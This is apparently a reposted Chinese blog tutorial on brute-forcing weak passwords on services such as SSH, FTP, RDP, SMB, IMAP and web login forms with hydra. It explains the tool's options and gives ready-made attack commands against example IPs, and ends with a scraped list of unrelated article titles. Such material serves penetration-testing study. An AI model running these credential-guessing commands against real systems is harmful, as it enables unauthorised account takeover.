如果对开启端口的服务不清楚,请看我之前写的文章:https://www.cnblogs.com/bmjoker/p/8833316.html

2018,网站的防护(sql,xss...)的安全保护也已经上升了一个等级,但是由于管理员的安全意识薄弱,网站弱口令漏洞依然猖獗,不信可以看补天的漏洞提交记录,弱口令依然是漏洞中的佼佼者,当然弱口令并不仅限于网站的后台登陆弱口令,还有端口,比如 Ftp:21,ssh:22,Telnet:23,Pop3:110,3389远程登陆,8080中间件Tomcat,7001中间件Weblogic,3306 Mysql数据库(phpmyadmin),1433 SQLServer数据库,5432 Postgresql数据库...

端口扫描不用多讲,鄙人还是觉得nmap好一点,但是如何批量扫的话,丢包率可能高一点。

对于端口的爆破,首先要有一个好的字典,然后再有一个好的工具,工具的话,python脚本,超级弱口令检测工具....这里主要介绍kali里面hydra的爆破,应为hydra支持几乎所有协议的在线密码破解,并且容错率好,不过能不能爆破成功还是需要你有一个好的字典。

---------------------------------------------------------------

语法:

# hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]

参数详解:

-R   根据上一次进度继续破解
-S   使用SSL协议连接
-s   指定端口
-l   指定用户名
-L   指定用户名字典(文件)
-p   指定密码破解
-P   指定密码字典(文件)
-e   空密码探测和指定用户密码探测(ns)-M   <FILE>指定目标列表文件一行一条-f   在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-C   用户名可以用:分割(username:password)可以代替-l username -p password
-o   <FILE>输出文件
-t   指定多线程数量,默认为16个线程-w   TIME 设置最大超时的时间,单位秒,默认是30s
-vV  显示详细过程
server     目标IP
service    指定服务名(telnet ftp pop3 mssql mysql ssh ssh2......)

使用案例:

爆破 ssh:22 端口命令:

hydra -L users.txt -P password.txt -t 5 -vV -o ssh.txt -e ns 192.168.0.132 ssh

爆破 Ftp:21 端口命令(指定用户名为root):

hydra -l root -P password.txt -t 5 -vV -o ftp.txt -e ns 192.168.0.132 ftp

get方式提交,破解web登录(指定用户名为admin):

hydra -L user.txt -p password.txt -t 线程 -vV -e ns ip http-get /admin/
hydra -l admin -p password.txt -t 线程 -vV -e ns -f ip http-get /admin/index.php

post方式提交,破解web登录:

hydra -l admin -P password.txt -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"

参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中的内容是表示错误猜解的返回信息提示。

破解https:

hydra -m /index.php -l admin -P password.txt 192.168.0.132 https

破解teamspeak:

hydra -l admin -P passworrd.txt -s 端口号 -vV 192.168.0.132 teamspeak

破解cisco:

hydra -P password.txt 192.168.0.132 cisco
hydra -m cloud -P password.txt 192.168.0.132 cisco-enable

破解smb:

hydra -l administrator -P password.txt 192.168.0.132 smb

破解pop3:

hydra -l root -P password.txt my.pop3.mail pop3

破解rdp(3389端口):

hydra -l administrator -P password.txt -V 192.168.0.132 rdp

破解http-proxy:

hydra -l admin -P passwprd.txt http-proxy://192.168.0.132

破解imap:

hydra -L user.txt -p secret 192.168.0.132 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

就先介绍到这里~~~

转载于:https://www.cnblogs.com/bmjoker/p/9977881.html

8.使用hydra对端口进行爆破相关推荐

  1. 在linux上禁用ip,防止frps转发的端口被爆破,并屏蔽境外ip

    更新时间:2022年3月7日15:26:26 首先在frps配置文件中加入日志记录 [common] bind_port = ** dashboard_user = ** dashboard_pwd ...

  2. Medusa(美杜莎)和Hydra(九头蛇)快速入门手册:02

    本文是Medusa和Hydra快速入门手册的第二部分,第一部分的传送门这两篇也是后续爆破篇的一部分,至于字典,放在最后,后续会把祖传的几十G字典准备好 Hydra入门使用手册 vanHauser Th ...

  3. Kevg靶机渗透实现 8080端口 8081端口 1322端口实现

    一.信息搜集 先使用ifconfig查看本机ip: 用nmap工具扫描本机ip段下的主机: 发现目标靶机ip为192.168.152.134 查看目标靶机开放了哪些端口: 发现80,8080,8081 ...

  4. 密码爆破工具:Medusa(美杜莎)-操作说明hydra-操作说明

    目录 密码爆破工具:Medusa(美杜莎)-操作说明 hydra-操作说明 密码爆破工具:Medusa(美杜莎)-操作说明 科普下: Medusa是支持AFP, CVS, FTP, HTTP, IMA ...

  5. 密码爆破工具:Medusa(美杜莎)-操作说明

    科普下: Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare), NNTP, PcAnywhere, POP3, Postg ...

  6. hydra的基本使用

    hydra的基本使用 一.什么是hydra 二.基本命令 ftp服务密码爆破 ssh服务密码爆破 一.什么是hydra Hydra 是一款爆破神器,可以对多种服务的账号和密码进行爆破,包括 数据库.S ...

  7. 路径,端口,工具总结专题

    一,常见端口总结 常见网络摄像头端口 一,远程管理端口 22 端口(SSH) #安全攻击:弱口令.暴力猜解.用户名枚举利用方式:1.通过用户名枚举可以判断某个用户名是否存在于目标主机中,2.利用弱口令 ...

  8. hydra 暴力破解

    hydra穷举爆破神器 常用破解命令 -R 继续从上一次进度接着破解. -S 采用SSL链接. -s PORT 可通过这个参数指定非默认端口. -l LOGIN 指定破解的用户,对特定用户破解. -L ...

  9. Medusa和Hydra快速入门手册

    Hydra入门使用手册 vanHauser TheHackersChoice http://www.thc.org/thc-hydra 目录 什么是Hydra? Hydra-GTK 如何安装 如何使用 ...

最新文章

  1. java局部变量全局变量,实例变量的理解
  2. 2017 Multi-University Training Contest 3 hdu 6063
  3. 【OpenCV 4开发详解】保存和读取XML和YMAL文件
  4. C++ map嵌套使用 链接
  5. 关于在asp.net中播放MP4格式的视频(好吧,只兼容支持html5的浏览器,ie8及以下的都歇菜了)...
  6. bugku 杂项 就五层你能解开吗_长春老旧小区加装电梯,你家符合条件吗?_媒体_澎湃新闻...
  7. 让领导狂夸,让业务目瞪口呆的报表,竟然是这样?
  8. 【Qt教程】2.3 - Qt5 控件 - 按钮组(QPushButton、QToolButton、QRadioButton、QCheckBox)资源编辑器导入资源
  9. [ubuntu] 按文件大小进行排序
  10. 大数据分析的思路与流程
  11. 未来的几年,不可能再有岁月静好
  12. python汉字排序_Python中文排序(转载)
  13. winhex 15.6 和 HexWorkshop 6.01注册机
  14. 抹机王怎么一键新机_ir新机工具箱手机版下载-ir新机抹机王盒子v5.6.6 免登陆版-007游戏网...
  15. X509 PKCS7 PKCS12
  16. yarn : 无法加载文件 C:\Users\L\AppData\Roaming\npm\yarn.ps1,因为在此系统上禁止运行脚本
  17. 地统计分析在气象领域的应用
  18. Linux操作系统的性能将主要取决于,高校邦Linux操作系统安全与性能调优章节测试答案...
  19. 低客单价的商品怎样做运营、怎么样做优化、以及怎样做推广
  20. 在3D空间中绘制四边形

热门文章

  1. asp.net MVC3 无法打开项目文件“E:\我们的项目\Project\HeatingMIS.Web\HeatingMIS.Web.csproj”。此安装不支持该项目类型。...
  2. Oracle内部错误:ORA-00600[2608]一例
  3. 如何将int类型数据转换成byte数组
  4. centos 6.5安装GitLab全过程和问题记录
  5. Haar小波变换的快速实现
  6. 推荐系统中所使用的混合技术介绍
  7. ubuntu pdf转jpg或txt
  8. 六、Linux 文件基本属性
  9. Python任务调度模块 – APScheduler,Flask-APScheduler实现定时任务
  10. “大院大所”合作对接活动专场推介会侧记